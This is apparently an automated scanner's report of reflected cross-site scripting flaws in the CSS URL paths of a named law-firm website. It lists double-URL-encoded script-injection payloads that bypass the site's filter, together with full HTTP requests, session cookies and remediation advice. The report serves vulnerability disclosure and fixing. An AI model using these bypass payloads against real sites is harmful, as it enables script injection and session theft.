Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 was submitted in the REST URL parameter 3. This input was echoed as bf81b"><script>alert(1)</script>ed17f52d89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.dialog.cssbf81b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eed17f52d89 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0 was submitted in the REST URL parameter 1. This input was echoed as 5cb17"><script>alert(1)</script>e53ecb908c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css5cb17%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee53ecb908c0/ui/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426 was submitted in the REST URL parameter 2. This input was echoed as 612ba"><script>alert(1)</script>8b00486b426 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui612ba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b00486b426/ui.progressbar.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e was submitted in the REST URL parameter 3. This input was echoed as 13c9c"><script>alert(1)</script>4a99b88c02e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui/ui.progressbar.css13c9c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4a99b88c02e HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be was submitted in the REST URL parameter 1. This input was echoed as 14fad"><script>alert(1)</script>9c0b0ee56be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css14fad%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e9c0b0ee56be/ui/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda was submitted in the REST URL parameter 2. This input was echoed as 3fcda"><script>alert(1)</script>8c138520eda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/ui3fcda%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8c138520eda/ui.resizable.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
